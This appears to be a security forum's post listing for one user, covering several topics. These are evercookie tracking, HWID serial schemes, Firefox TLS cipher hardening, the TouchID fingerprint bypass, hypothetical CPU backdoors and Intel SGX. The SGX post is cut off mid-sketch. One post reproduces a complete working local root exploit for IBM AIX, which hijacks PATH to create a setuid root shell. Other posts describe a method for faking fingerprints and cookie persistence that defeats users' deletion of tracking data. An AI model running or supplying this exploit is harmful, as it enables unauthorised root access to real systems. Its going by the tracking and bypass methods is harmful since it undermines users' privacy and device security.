Nytro

Everything posted by Nytro

  1. evercookie -- never forget.

DESCRIPTION

evercookie is a javascript API available that produces extremely persistent cookies in a browser. Its goal is to identify a client even after they've removed standard cookies, Flash cookies (Local Shared Objects or LSOs), and others.

evercookie accomplishes this by storing the cookie data in several types of storage mechanisms that are available on the local browser. Additionally, if evercookie has found the user has removed any of the types of cookies in question, it recreates them using each mechanism available. Specifically, when creating a new cookie, it uses the following storage mechanisms when available:

- Standard HTTP Cookies
- Local Shared Objects (Flash Cookies)
- Silverlight Isolated Storage
- Storing cookies in RGB values of auto-generated, force-cached PNGs using HTML5 Canvas tag to read pixels (cookies) back out
- Storing cookies in Web History
- Storing cookies in HTTP ETags
- Storing cookies in Web cache
- window.name caching
- Internet Explorer userData storage
- HTML5 Session Storage
- HTML5 Local Storage
- HTML5 Global Storage
- HTML5 Database Storage via SQLite

TODO: adding support for:
- Caching in HTTP Authentication
- Using Java to produce a unique key based off of NIC info

Got a crazy idea to improve this? Email me!

Download: http://samy.pl/evercookie/evercookie-0.4.tgz
Sursa: http://samy.pl/evercookie/
  2. The more complicated version:
1. You create your own PKI
2. You sign a certificate for each HWID
3. You check that the user has that certificate (signed by your CA) for his HWID
4. I'm not sure you should even consider this option

What an attacker does:
1. Buys a valid serial for his own HWID
2. Makes the serial and the HWID public
3. Other people change their HWID (I think that's possible) and use the same serial
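Stripped of X.509 details, the per-HWID check in step 3 can be sketched with Python's standard library. Here an HMAC keyed with a vendor-only secret stands in for the CA signature; all names are made up for illustration, and a real PKI would use asymmetric signatures so the verification key shipped to users cannot issue new licenses:

```python
import hashlib
import hmac

VENDOR_SECRET = b"hypothetical vendor signing key"  # stays on the vendor's server

def issue_license(hwid: str) -> str:
    """Vendor side: 'sign' the HWID (stand-in for issuing a per-HWID certificate)."""
    return hmac.new(VENDOR_SECRET, hwid.encode(), hashlib.sha256).hexdigest()

def verify_license(hwid: str, token: str) -> bool:
    """Client side: check that the token was issued for exactly this HWID."""
    return hmac.compare_digest(issue_license(hwid), token)
```

Note that this only partially addresses the attacker scenario above: a published (HWID, token) pair still works for anyone who can spoof that HWID, which is exactly the weakness described.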
  3. You build an algorithm that derives a "serial" from the HWID. For example, say you have the HWID "9005eefa-dad1-53b4-baab-56ecfbf9d55c". You could do this:
1. Take the md5 of the first part (9005eefa)
2. Take the sha1 of the last part (56ecfbf9d55c)
3. Base64 "dad1"
4. Rot13 "53b4"
5. Hex-encode each character of "baab"
6. Take the first 3 bytes of each, concatenate them and bang, you have a serial (in hex, for example)
These are just a few silly ideas; pick whatever transforms you like. Of course, it can be cracked if someone reverse engineers the program, but this is essentially a problem with no solution: WHATEVER you do, it can still be cracked.
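A minimal sketch of the scheme above, assuming the transforms and the "first 3 bytes of each" rule exactly as listed (the function name is made up):

```python
import base64
import codecs
import hashlib

def hwid_to_serial(hwid: str) -> str:
    # HWID format assumed: "9005eefa-dad1-53b4-baab-56ecfbf9d55c"
    p1, p2, p3, p4, p5 = hwid.split("-")
    transforms = [
        hashlib.md5(p1.encode()).hexdigest(),    # 1. md5 of the first part
        hashlib.sha1(p5.encode()).hexdigest(),   # 2. sha1 of the last part
        base64.b64encode(p2.encode()).decode(),  # 3. base64 of the second part
        codecs.encode(p3, "rot13"),              # 4. rot13 of the third part
        "".join(f"{ord(c):02x}" for c in p4),    # 5. hex of each char of the fourth part
    ]
    # 6. take the first 3 bytes of each transform and concatenate
    return "-".join(t[:3] for t in transforms)
```

Because every transform is deterministic, the same HWID always yields the same serial, which is what the license check needs.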
  4. [h=1]IBM AIX 6.1 / 7.1 - Local root Privilege Escalation[/h]

#!/bin/sh
# Exploit Title: IBM AIX 6.1 / 7.1 local root privilege escalation
# Date: 2013-09-24
# Exploit Author: Kristian Erik Hermansen <kristian.hermansen@gmail.com>
# Vendor Homepage: http://www.ibm.com
# Software Link: http://www-03.ibm.com/systems/power/software/aix/about.html
# Version: IBM AIX 6.1 and 7.1, and VIOS 2.2.2.2-FP-26 SP-02
# Tested on: IBM AIX 6.1
# CVE: CVE-2013-4011

echo ' mm mmmmm m m ## # # # # # # ## #mm# # m""m # # mm#mm m" "m '
echo " [*] AIX root privilege escalation"
echo " [*] Kristian Erik Hermansen"
echo " [*] https://linkedin.com/in/kristianhermansen"
echo "
+++++?????????????~.:,.:+???????????++++
+++++???????????+...:.,.,.=??????????+++
+++???????????~.,:~=~:::..,.~?????????++
+++???????????:,~==++++==~,,.?????????++
+++???????????,:=+++++++=~:,,~????????++
++++?????????+,~~=++++++=~:,,:????????++
+++++????????~,~===~=+~,,::,:+???????+++
++++++???????=~===++~~~+,,~::???????++++
++++++++?????=~=+++~~~:++=~:~+???+++++++
+++++++++????~~=+++~+=~===~~:+??++++++++
+++++++++?????~~=====~~==~:,:?++++++++++
++++++++++????+~==:::::=~:,+??++++++++++
++++++++++?????:~~=~~~~~::,??+++++++++++
++++++++++?????=~:~===~,,,????++++++++++
++++++++++???+:==~:,,.:~~..+??++++++++++
+++++++++++....==+===~~=~,...=?+++++++++
++++++++,........~=====..........+++++++
+++++................................++=
=+:....................................=
"

TMPDIR=/tmp
TAINT=${TMPDIR}/arp
RSHELL=${TMPDIR}/r00t-sh

cat > ${TAINT} <<-!
#!/bin/sh
cp /bin/sh ${RSHELL}
chown root ${RSHELL}
chmod 4555 ${RSHELL}
!

chmod 755 ${TAINT}
PATH=.:${PATH}
export PATH
cd ${TMPDIR}
/usr/bin/ibstat -a -i en0 2>/dev/null >/dev/null
if [ -e ${RSHELL} ]; then
    echo "[+] Access granted. Don't be evil..."
    ${RSHELL}
else
    echo "[-] Exploit failed. Try some 0day instead..."
fi

Sursa: IBM AIX 6.1 / 7.1 - Local root Privilege Escalation
  5. Author: Nytro @ Romanian Security Team

Since rumors have appeared that the NSA performs MITM (Man in The Middle) attacks - in plain terms, that it intercepts Internet traffic to spy on what people are doing - we should learn a bit about how to protect our privacy against such problems. This article is aimed at people who use Mozilla; it does not assume the use of VPNs. I simply want to present a few settings you can change in the browser to increase your safety in case someone tries to decrypt your traffic.

The first thing I recommend is to install this Firefox add-on: https://addons.mozilla.org/ro/firefox/addon/calomel-ssl-validation/

Screenshot:

The add-on is very useful in several respects:
1. It lets you see, in a very simple way, how strong the encryption used on the sites you visit is
2. It lets you see in detail how the encryption was negotiated, awarding "points" for the algorithms used
3. It lets you change several useful settings

I started writing this article because Facebook, Google and other major sites offer, by default, very weak (symmetric) encryption: RC4 with 128 bits! You can find more details about the RC4 algorithm and its problems here: https://en.wikipedia.org/wiki/RC4#Security

In short, this article comes down to how you can force Firefox to use stronger, safer algorithms.

How SSL/TLS works

I don't want this to turn into an article about SSL/TLS, but I have to cover a few basics. SSL/TLS are protocols - more precisely, sets of rules that must be followed in order to establish a secure connection between your computer and the site you are visiting. TLS is essentially an improved version of SSL. SSL versions 1.0, 2.0 and 3.0 are old and should no longer be used, especially since they are known to have security problems.
TLS 1.0 is an improved version of SSL 3.0, and TLS 1.1 and TLS 1.2 are newer TLS versions.

An SSL connection is established as follows:
1. The TCP connection is established (I won't go into details)
2. The client (the browser) sends a "Client Hello" to the server. The request specifies the SSL/TLS version - most of the time, by default, TLS 1.0 - and the list of supported cipher suites. Example: TLS_DHE_RSA_WITH_AES_256_CBC_SHA, where:
  1. TLS = the protocol, TLS or SSL
  2. DHE = ephemeral Diffie-Hellman, the key-exchange algorithm
  3. RSA = the algorithm used for authentication
  4. AES_256_CBC = the algorithm used for symmetric encryption (CBC is the block mode in which AES is used)
  5. SHA = the algorithm used for validating data integrity (the hash)
3. The server replies with a "Server Hello", answering with the supported version, for example TLS 1.0, and the chosen cipher suite (the algorithms used for encryption)
4. The server sends its certificate (or certificates), through which it identifies itself. In effect it says: "Look, this is proof that I am www.cia.gov". For the browser to recognize the certificate as valid, it must be signed by a recognized authority: VeriSign or other companies accepted as legitimate certificate signers. After all, I too can create a certificate for the domain "www.cia.gov", but it will be signed by Nytro, not by VeriSign, and you probably trust them more than you trust me.
5. The client checks whether the certificate is in order, and if everything is OK, the key exchange takes place. This is the asymmetric part: keys are exchanged using RSA (the most solid choice, I think), DH (Diffie-Hellman) or ECDH (DH over elliptic curves), depending on the cipher suite the server chose from the list sent by the client.
6. Using the keys exchanged above, the data is encrypted with the symmetric algorithm (AES, for example) using the keys from the "Key exchange" step. The key size depends on the cipher suite.
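The suite-name breakdown in step 2 is mechanical, so it can be expressed as a short parser. A sketch (the function is mine, not part of any library), assuming IANA-style names of the form PROTO_KEX[_AUTH]_WITH_CIPHER_MAC:

```python
def parse_cipher_suite(name: str) -> dict:
    """Split e.g. TLS_DHE_RSA_WITH_AES_256_CBC_SHA into its components."""
    proto, rest = name.split("_", 1)
    kex_auth, cipher_mac = rest.split("_WITH_")
    kex, _, auth = kex_auth.partition("_")
    cipher, _, mac = cipher_mac.rpartition("_")
    return {
        "protocol": proto,              # TLS or SSL
        "key_exchange": kex,            # e.g. DHE, ECDHE, RSA
        "authentication": auth or kex,  # plain RSA suites use RSA for both
        "cipher": cipher,               # e.g. AES_256_CBC
        "mac": mac,                     # e.g. SHA
    }
```

For the example above, `parse_cipher_suite("TLS_DHE_RSA_WITH_AES_256_CBC_SHA")` yields DHE key exchange, RSA authentication, AES_256_CBC as the cipher and SHA as the integrity algorithm.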
For example, if 128-bit AES is used, breaking the transmitted data by brute force requires trying 2^128 (2 to the power of 128) keys. If the algorithm is RC4, however, since many attacks against it are known, the chances are much higher that such encryption can be broken in a much shorter time.

What can we do?

As I said, by default browsers send the complete cipher-suite list, and the server usually picks a simple, fast algorithm like RC4, both for page-load speed and for compatibility with older browsers. We can, however, force it to choose a stronger cipher simply by modifying the cipher-suite list the browser sends to the server, removing "weak" cipher suites like RC4.

Settings in Mozilla

All the SSL settings are made from the configuration page: about:config

For simplicity, search for: security.ssl

Screenshot:

From here we can disable certain cipher suites. I can't tell you with certainty which ones are safe and which are not, but I can recommend choosing RSA (for the key exchange) and AES (256-bit). I disabled everything except RSA_AES_256_SHA:

You can also opt for elliptic curves. Aside from an elliptic-curve-based PRNG (Pseudo Random Number Generator) in which problems were discovered and which is suspected of being an NSA backdoor, and aside from the fact that the NSA collaborates with NIST (who define the "security" standards) and could therefore influence certain elliptic curves (which is why I said I prefer RSA), you can use elliptic curves, since they put less load on the CPU and are "stronger".

The result

Close the browser, reopen it, and:

We are SAFER. Also, TLS 1.1 and TLS 1.2 have been supported by Firefox since Firefox 24, but they are DISABLED by default (probably because they are incompletely implemented).
To enable them, on the about:config page search for: security.tls

And change the values:
- security.tls.version.min = 0 (SSL 3.0)
- security.tls.version.max = 1 (TLS 1.0)

to:
- security.tls.version.min = 1 (TLS 1.0)
- security.tls.version.max = 3 (TLS 1.2)

IMPORTANT: You may run into problems establishing the TLS connection with older servers! In that case the only options are to re-enable some weaker cipher suites or to stop visiting that site.

If you have any questions or problems, I'll answer them here.

Thanks, Nytro
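The same min/max idea is not Firefox-specific. As an illustration, Python's standard ssl module exposes equivalent knobs on a client context (the values here reflect today's baseline of TLS 1.2+, rather than the TLS 1.0 floor of the article's era):

```python
import ssl

# Counterpart of security.tls.version.min / security.tls.version.max
ctx = ssl.create_default_context()
ctx.minimum_version = ssl.TLSVersion.TLSv1_2  # refuse SSL 3.0, TLS 1.0, TLS 1.1
ctx.maximum_version = ssl.TLSVersion.TLSv1_3
```

Exactly as the warning above says, raising the floor can break handshakes with old servers; the trade-off is the same as with the about:config settings.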
  6. as the verse goes: Hacking is not a CRIME - And a special dedication from Nytro to all his enemies, to the cops everywhere!
  7. Why I Hacked Apple’s TouchID, And Still Think It Is Awesome.

By Marc Rogers

By now, the news is out: TouchID was hacked. In truth, none of us really expected otherwise. Fingerprint biometrics use a security credential that gets left behind everywhere you go on everything you touch. The fact that fingerprints can be lifted is not really up for debate; CSI technicians have been doing it for decades. The big question with TouchID was whether or not Apple could implement a design that would resist attacks using lifted fingerprints, or whether they would join the long line of manufacturers who had tried but failed to implement a completely secure solution.

Does this mean TouchID is flawed and that it should be avoided? The answer to that isn’t as simple as you might think. Yes, TouchID has flaws, and yes, it’s possible to exploit those flaws and unlock an iPhone. But the reality is that these flaws are not something the average consumer should worry about. Why? Because exploiting them was anything but trivial.

Hacking TouchID relies upon a combination of skills, existing academic research and the patience of a Crime Scene Technician. First you have to obtain a suitable print. A suitable print needs to be unsmudged and be a complete print of the correct finger that unlocks a phone. If you use your thumb to unlock it, the way Apple designed it, then you are looking for the finger which is least likely to leave a decent print on the iPhone. Try it yourself. Hold an iPhone in your hand and try the various positions that you would use the phone in. You will notice that the thumb doesn’t often come into full contact with the phone, and when it does it's usually in motion. This means the prints tend to be smudged. So in order to “hack” your phone a thief would have to work out which finger is correct AND lift a good clean print of the correct finger.

Next you have to “lift” the print. This is the realm of CSI.
You need to develop the print using one of several techniques involving the fumes from cyanoacrylate (“super glue”) and a suitable fingerprint powder before carefully (and patiently) lifting the print using fingerprint tape. It is not easy. Even with a well-defined print, it is easy to smudge the result, and you only get one shot at this: lifting the print destroys the original.

So now what? If you got this far, the chances are you have a slightly smudged print stuck to a white card. Can you use this to unlock the phone? This used to work on some of the older readers, but not for many years now, and certainly not with this device. To crack this control you will need to create an actual fake fingerprint.

Creating the fake fingerprint is arguably the hardest part and by no means “easy.” It is a lengthy process that takes several hours and uses over a thousand dollars worth of equipment including a high resolution camera and laser printer. First of all, you have to photograph the print, remembering to preserve scale, maintain adequate resolution and ensure you don’t skew or distort the print. Next, you have to edit the print and clean up as much of the smudging as possible. Once complete, you have two options:

The CCC method: invert the print in software, and print it out onto transparency film using a laser printer set to maximum toner density. Then smear glue and glycerol on the ink side of the print and leave it to cure. Once dried, you have a thin layer of rubbery dried glue that serves as your fake print.

The method I used was demonstrated by Tsutomu Matsumoto in his 2002 paper “The Impact of Artificial “Gummy” Fingers on Fingerprint Systems”. In this technique, you take the cleaned print image and, without inverting it, print it to transparency film. Next, you take the transparency film and use it to expose some thick copper clad photosensitive PCB board that’s commonly used in amateur electrical projects.
After developing the image on the PCB using special chemicals, you put the PCB through a process called “etching” which washes away all of the exposed copper, leaving behind a fingerprint mold. Smear glue over this and when it dries, you have a fake fingerprint.

Using fake fingerprints is a little tricky; I got the best results by sticking the fake print to a slightly damp finger. My supposition is that this tactic improves contact by evening out any difference in electrical conductivity between this and the original finger.

So what do we learn from all this? Practically, an attack is still a little bit in the realm of a John le Carré novel. It is certainly not something your average street thief would be able to do, and even then, they would have to get lucky. Don’t forget you only get five attempts before TouchID rejects all fingerprints, requiring a PIN code to unlock the phone. However, let’s be clear: TouchID is unlikely to withstand a targeted attack. A dedicated attacker with time and resources to observe his victim and collect data is probably not going to see TouchID as much of a challenge. Luckily this isn’t a threat that many of us face.

TouchID is not a “strong” security control. It is a “convenient” security control. Today just over 50 percent of users have any PIN on their smartphones at all, and the number one reason people give for not using the PIN is that it’s inconvenient. TouchID is strong enough to protect users from casual or opportunistic attackers (with one concern I will cover later on) and it is substantially better than nothing.

Today, we have more sensitive data than ever before on our smart devices. To be honest, many of us should treat our smartphone like a credit card, because you can perform many of the same financial transactions with it. Fingerprint security will help protect you against the three biggest threats facing smartphone users today:

Fingerprint security will protect your data from a street thief that grabs your phone.
Fingerprint security will protect you in the event you drop/forget/misplace your phone.

Fingerprint security could protect you against phishing attacks (if Apple allows it).

Fingerprint security has a darker side though: we need to carefully evaluate how its data is going to be managed and the impact it will have on personal privacy. First and foremost is the question of how fingerprint data will be managed. As Senator Al Franken pointed out to Apple in his letter dated September 19, we only have ten fingerprints, and a stolen or public fingerprint could lead to lifelong challenges. Just imagine your fingerprints turning up at every crime scene in the country! The big questions here are:

What data does Apple capture from a finger as it is enrolled?
How is this data stored and how is it accessed?
Can this data be used to recreate a user’s fingerprint mathematically or through visual reconstruction?

In a similar fashion, fingerprints are viewed quite differently from passwords and PINs in the eyes of the law. For example, the police or other law enforcement officials can compel you to surrender your fingerprints, something they currently can’t do quite as easily with passwords or PINs, despite some recent judicial challenges to that position.

As a technology, fingerprint biometrics has a flaw that’s likely to be repeatedly exposed and fixed in future products. We shouldn’t let this distract us or make us think that fingerprint biometrics should be abandoned; instead we should ensure that future products and services are designed with this in consideration. If we play to its strengths and anticipate its weaknesses, fingerprint biometrics can add great value to both security and user experience.

What I, and many of my colleagues, are waiting for (with bated breath) is TouchID-enabled two-factor authentication. By combining two low-to-medium security tokens, such as a fingerprint and a 4-digit PIN, you create something much stronger.
Each of these tokens has its flaws and each has its strengths. Two-factor authentication allows you to benefit from those strengths while mitigating some of the weaknesses.

Imagine a banking application where on startup you use a fingerprint for convenience: it’s nice and quick and only needs to ensure the right person has started it. However, as soon as you want to do something sensitive like check a balance or transfer some funds, we kick it up a notch by asking for two-factor authentication: the fingerprint and a 4-digit PIN. This combination is strong enough to protect the user against most scenarios, from physical theft through to phishing attacks. If implemented correctly, TouchID-enabled two-factor authentication in enterprise applications could be a good defense against phishing attacks by attackers like the Syrian Electronic Army. You can trick a user into giving up any kind of passcode, but it is much harder to trick a user into giving up his or her fingerprints from the other side of the world.

Despite being hacked, TouchID is an exciting step forward for smartphone security, and I stand by our earlier blog on fingerprint security. Hacking TouchID gave me respect for its design and some ideas about how we can make it stronger moving forward. I hope that Apple will keep in touch with the security industry as TouchID faces its inevitable growing pains. There is plenty of room for improvement, and an exciting road ahead of us if we do this right. For starters, Apple: can we have two-factor authentication please?

Sursa: https://blog.lookout.com/blog/2013/09/23/why-i-hacked-apples-touchid-and-still-think-it-is-awesome/
  8. It's still a (stack-based, as in the tutorial) buffer overflow, but one where, because of a small logic error, you can only overrun the buffer by a single byte.
  9. Hackers claim first iPhone 5s fingerprint reader bypass; bounty founder awaiting verification

Summary: One hacker group claims to have bypassed the Apple iPhone 5s fingerprint reader. ZDNet spoke to the founder of a bypass-seeking bounty on how the alleged hack will be verified.

By Zack Whittaker for Zero Day | September 22, 2013

iPhone 5s' fingerprint reader, dubbed "Touch ID." (Image: Apple)

Hackers from the Germany-based Chaos Computer Club (CCC) claim to have bypassed the fingerprint reader in Apple's iPhone 5s, dubbed "Touch ID," just two days after the smartphone first went on sale.

In a statement on its website, the CCC confirmed that the bypass had taken place, adding: "A fingerprint of the phone user, photographed from a glass surface, was enough to create a fake finger that could unlock an iPhone 5s secured with Touch ID."

The video shows one user enrolling their finger, while later accessing the device using a different finger with a high-resolution latex or wood glue cast. The group detailed in a blog post how it accessed the device using a fake print by photographing a fingerprint and converting it. "Apple's sensor has just a higher resolution compared to the sensors so far," said CCC spokesperson Frank Rieger on the group's website. "So we only needed to ramp up the resolution of our fake."

The Chaos Computer Club is one of the longest-running hacking groups in the world. The CCC produces the world's oldest hacking conference, and this year will celebrate its 30th gathering ("30C3") in Hamburg, Germany, in December.

Bounty on deck, pending confirmation

Nick Depetrillo, who spoke to ZDNet on the phone on Sunday, explained how he set up a fingerprint reader bypass bounty as "putting my money where my mouth is." He submitted $100 of his own money into the crowdsourced pot.
Working in conjunction with cybersecurity expert Robert Graham, who added $500 out of his own pocket to the mix, the two set up the website istouchidhackedyet.com, which catalogs those who pledge money to cracking the iPhone 5s' security feature. The website has been updated with a "Maybe!" message, confirming that a submission has been made by the hacker group, but noted that verification is still pending. To win the bounty, security researchers must video the lifting of a print, "like from a beer mug," and show it unlocking the phone, the website states.

Describing the collective bounty as an "honor system," Depetrillo's website has cataloged thousands of dollars in cash (and hundreds of dollars escrowed by independent law firm CipherLaw), numerous bottles of liquor, a book of erotica, and even an iPhone 5c.

But according to ZDNet's Violet Blue, who covered this story earlier in September, some are exploiting the high-profile bounty in a bid to generate press attention. One venture capitalist, who was understood to have contributed $10,000 to the bounty — though they declined to add it to a secure escrow account — reportedly misrepresented the project and spoke for the crowdsourced project "at every press opportunity." Many major news outlets as a result mistakenly attributed the project to the venture capitalist and not Depetrillo and Graham.

Review and judging process

Depetrillo explained that he, along with Graham, will review and judge the verification process. "The Chaos Computer Club [or any other submitter] will need to show us a complete video, documentation, and walkthrough lifting the print, re-creating the print, and having one human enrol their finger and another human somehow unlock that phone using the first person's print," he said.

Depetrillo confirmed that there have been no other submissions yet, but noted that he has a "lot of respect for the CCC."
He told ZDNet that he was "not surprised" when the hacker group appeared to be the first to submit a possible solution. "When we get complete documentation, we will review it and post our own technical justifications why we think this is a winning solution," he added. "If we clearly see and understand this is a sufficient and satisfactory winning solution, we will declare them the winner.

"We want to convince everybody, not just ourselves, so that others could accept it as such. And everyone is free to debate it — and disagree with it. But if we believe there is a winner, we will hand over our promised money."

Depetrillo said this is a one-time bounty on his part, but noted that others are welcome to start their own crowdsourced efforts for any additional hacks or bypasses. "But I look forward to sending my $100 to the winner," he said.

Sursa: Hackers claim first iPhone 5s fingerprint reader bypass; bounty founder awaiting verification | ZDNet
  10. Installing And Using Kali Linux, Metasploit, Nmap And More On Android Description: Installing and using Kali Linux, Metasploit, nmap and more on android danielhaake.de twitter.com/3lL060 youtube.com/user/3lL060 facebook.com/arniskinamutay external Link: Kali Linux on Android using Linux Deploy | Kali Linux Sursa: Installing And Using Kali Linux, Metasploit, Nmap And More On Android
  11. Blackhat Us 2013 - Karsten Nohl - Rooting Sim Cards Description: SIM cards are among the most widely-deployed computing platforms with over 7 billion cards in active use. Little is known about their security beyond manufacturer claims. Besides SIM cards’ main purpose of identifying subscribers, most of them provide programmable Java runtimes. Based on this flexibility, SIM cards are poised to become an easily extensible trust anchor for otherwise untrusted smartphones, embedded devices, and cars. The protection pretense of SIM cards is based on the understanding that they have never been exploited. This talk ends this myth of unbreakable SIM cards and illustrates that the cards -- like any other computing system -- are plagued by implementation and configuration bugs. For More Information please visit : - https://www.blackhat.com/us-13/ Sursa: Blackhat Us 2013 - Karsten Nohl - Rooting Sim Cards
  12. [h=3]More Thoughts on CPU backdoors[/h]

I've recently exchanged a few emails with Loic Duflot about CPU-based backdoors. It turned out that he recently wrote a paper about hypothetical CPU backdoors and also implemented some proof-of-concept ones using QEMU (for he doesn't happen to own a private CPU production line). The paper can be bought here. (Loic is an academic, and so he must follow some of the strange customs of the academic world, one of them being that papers are not freely published, but rather sold on a publisher's website… Heck, even we, the ultimately commercialized researchers, still publish our papers and code for free).

Let me stress that what Loic writes about in the paper are only hypothetical backdoors, i.e. no actual backdoors have been found on any real CPU (ever, AFAIK!). What he does is consider how Intel or AMD could implement a backdoor, and then simulate this process by implementing those backdoors inside QEMU. Loic also focuses on local privilege escalation backdoors only. You should not, however, underestimate a good local privilege escalation: such a thing could be used to break out of any virtual machine, like VMWare, or potentially even out of a software VM like e.g. the Java VM.

The backdoors Loic considers are somewhat similar in principle to the simple pseudo-code one-liner backdoor I used in my previous post about hardware backdoors, only more complicated in the actual implementation, as he took care of a few important details that I naturally didn't concern myself with. (BTW, the main message of my previous post was how cool this VT-d technology is, being able to prevent PCI-based backdoors, not how doomed we are because of Intel- or AMD-induced potential backdoors).
Some people believe that processor backdoors do not exist in reality, because if they did, the competing CPU makers would be able to find them in each other's products and would later likely cause a "leak" to the public about such backdoors (think: black PR). Here people make the assumption that AMD or Intel is technically capable of reversing each other's processors, which seems to be a natural consequence of them being able to produce them. I don't think I fully agree with such an assumption, though. Just the fact that you are capable of designing and producing a CPU doesn't mean you can also reverse engineer one. Just the fact that Adobe can write a few-hundred-megabyte application doesn't mean they are automatically capable of reverse engineering similar applications of that size. Even if we assumed that it is technically feasible to use an electron microscope to scan and map all the electronic elements of the processor, there is still the problem of interpreting how all those hundreds of millions of transistors actually work.

Anyway, a few more thoughts about the properties of hypothetical backdoors that Intel or AMD might use (or be using).

First, I think that in such a backdoor scenario everything besides the "trigger" would be encrypted. The trigger is something that you must execute first in order to activate the backdoor (e.g. the CMP instruction with particular, i.e. magic, values in some registers, say EAX, EBX, ECX, EDX). Only then does the backdoor get activated and e.g. the processor auto-magically escalates into Ring 0. Loic considers this in more detail in his paper. So, my point is that all the attacker's code that executes afterwards (think of it as the shellcode for the backdoor, specific to the OS) is fetched by the processor in an encrypted form and decrypted only internally, inside the CPU.
That should be trivial to implement, while at the same time it would complicate any potential forensic analysis afterwards: it would be highly non-trivial to understand what the backdoor actually has done.

Another crucial thing for a processor backdoor, I think, would be some sort of anti-replay protection. Normally, if a smart admin had been recording all the network traffic, and also all the executables that ever got executed on the host, chances are that he or she would catch the triggering code and the shellcode (which might be encrypted, but still). So, no matter how subtle the trigger is, it is still quite possible that a curious admin will eventually find out that some tetris.exe somehow managed to break out of a hardware VM and did something strange, e.g. installed a rootkit in a hypervisor (or that some Java code somehow was able to send over all our DOCX files from our home directory). Eventually the curious admin will find that strange CPU instruction (the trigger) after which all the strange things happened. Now, if the admin was able to take this code and replicate it, post it to Daily Dave, then, assuming his message passed through the Moderator (Hi Dave), he would effectively compromise the processor vendor's reputation.

An anti-replay mechanism could ideally be some sort of challenge-response protocol used in the trigger. So, instead of always having to put 0xdeadbeaf, 0xbabecafe, and 0x41414141 into EAX, EBX and EDX and execute some magic instruction (say CMP), you would have to put in a magic that is the result of some crypto operation, taking the current date and a magic key as input: Magic = MAGIC(Date, IntelSecretKey). The obvious problem is how the processor can obtain the current date. It would have to talk to the south bridge at best, which is 1) nontrivial, 2) observable on a bus, and 3) spoofable.
A much better idea would be to equip the processor with some sort of EEPROM memory, big enough to hold one 64-bit or maybe 128-bit value. Each processor would get a different value flashed there when leaving the factory. Now, in order to trigger the backdoor, the processor vendor (or backdoor operator, think: NSA) would have to do the following: 1) first execute some code that reads this unique value stored in the EEPROM of the particular target processor and sends it back to them, 2) then generate the actual magic for the trigger: Magic = MAGIC (UniqueValueInEeprom, IntelSecretKey), 3) and finally send the actual code to execute the backdoor and shellcode, with the correct trigger embedded, based on the magic value.

Now, the point is that the processor would automatically increment the unique number stored in the EEPROM, so the same backdoor-exploiting code would not work twice on the same processor (while at the same time it would be easy for the NSA to send another exploit, as they know what the next value in the EEPROM should be). Also, such a customized exploit would not work on any other CPU, as the assumption was that each CPU gets a different value at the factory, so again it would not be possible to replicate the attack and prove that a particular piece of code has ever done something wrong. So, the moment I learn that processors have built-in EEPROM memory, I will start seriously thinking there are backdoors out there.

One thing that bothers me with all these divagations about hypothetical backdoors in processors is that I find them pretty useless at the end of the day. After all, by talking about those backdoors, and how they might be created, we do not make it any easier to protect against them, as there simply is no possible defense here. Nor does this make it any easier for us to build such backdoors (if we wanted to become the bad guys for a change).
It might only be of interest to Intel or AMD, or whatever other processor maker, but I somewhat feel they have already spent much more time thinking about it, and chances are they can only laugh at what we are saying here, seeing how unsophisticated our proposed backdoors are. So, my Dear Reader, I think you've just been wasting time reading this post. Sorry for tricking you into this, and I hope to write something more practical next time.

Posted by Joanna Rutkowska at Tuesday, June 02, 2009

Source: The Invisible Things Lab's blog: More Thoughts on CPU backdoors
  13. [h=3]Thoughts on Intel's upcoming Software Guard Extensions (Part 2)[/h]

In the first part of this article, published a few weeks ago, I discussed the basics of Intel SGX technology, as well as the challenges of using SGX for securing desktop systems, focusing specifically on the problem of trusted input and output. In this part we will look at some other aspects of Intel SGX, starting with a discussion of how it could be used to create truly irreversible software.

SGX Blackboxing – Apps and malware that cannot be reverse engineered?

A nice feature of Intel SGX is that the processor automatically encrypts the content of SGX-protected memory pages whenever they leave the processor caches and are stored in DRAM. In other words, the code and data used by SGX enclaves never leave the processor in plaintext. This feature, no doubt influenced by the DRM industry, might profoundly change our approach as to who really controls our computers. This is because it will now be easy to create an application, or malware for that matter, that just cannot be reverse engineered in any way. No more IDA, no more debuggers, not even kernel debuggers, could reveal the actual intentions of the EXE file we're about to run.

Consider the following scenario, where a user downloads an executable, say blackpill.exe, which in fact logically consists of three parts:

A 1st stage loader (SGX loader), which is unencrypted, and whose task is to set up an SGX enclave, copy the rest of the code there, specifically the 2nd stage loader, and then start executing the 2nd stage loader...

The 2nd stage loader, which starts executing within the enclave, performs remote attestation with an external server and, in case the remote attestation completes successfully, obtains a secret key from the remote server. This code is also delivered in plaintext.
Finally, the encrypted blob, which can only be decrypted using the key obtained by the 2nd stage loader from the remote server, and which contains the actual logic of the application (or malware).

We can easily see that there is no way for the user to figure out what the code from the encrypted blob is going to do on her computer. This is because the key will be released by the remote server only if the 2nd stage loader can prove via remote attestation that it indeed executes within a protected SGX enclave and that it is the original, unmodified loader code that the application's author created. Should one bit of this loader be modified, or should it be run outside of an SGX enclave, or within a somehow misconfigured SGX enclave, the remote attestation would fail and the key would not be obtained.

And once the key is obtained, it is available only within the SGX enclave. It cannot be found in DRAM or on the memory bus, even if the user had access to expensive DRAM emulators or bus sniffers. The key also cannot be mishandled by the code that runs in the SGX enclave, because remote attestation has also proved that the loader code has not been modified, and the author wrote the loader specifically not to mishandle the key in any way (e.g. not to write it out somewhere to unprotected memory, or store it on disk). Now, the loader uses the key to decrypt the payload, and this decrypted payload remains within the secure enclave, never leaving it, just like the key. Its data never leaves the enclave either...

One little catch is how the key is actually sent to the SGX-protected enclave so that it cannot be spoofed in the middle. Of course it must be encrypted, but under which key? Well, we can have our 2nd stage loader generate a new key pair and send the public key to the remote server; the server will then use this public key to send back the actual decryption key, encrypted with this loader's public key.
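The naive key-delivery scheme just described could be sketched in Ruby as follows. The construction is mine, not Intel's: RSA-OAEP stands in for whatever wrapping the loader's author would actually choose.

```ruby
require 'openssl'

# Hypothetical sketch of the naive key delivery: the 2nd stage loader
# generates a key pair inside the enclave, and the remote server wraps
# the payload-decryption key with the public half.

# Inside the enclave: generate an ephemeral key pair.
loader_key = OpenSSL::PKey::RSA.new(2048)

# Only the public half travels to the remote server.
server_side_pub = OpenSSL::PKey::RSA.new(loader_key.public_key.to_pem)

# On the server: wrap the 256-bit payload key for this particular enclave.
payload_key = OpenSSL::Random.random_bytes(32)
wrapped_key = server_side_pub.public_encrypt(
  payload_key, OpenSSL::PKey::RSA::PKCS1_OAEP_PADDING)

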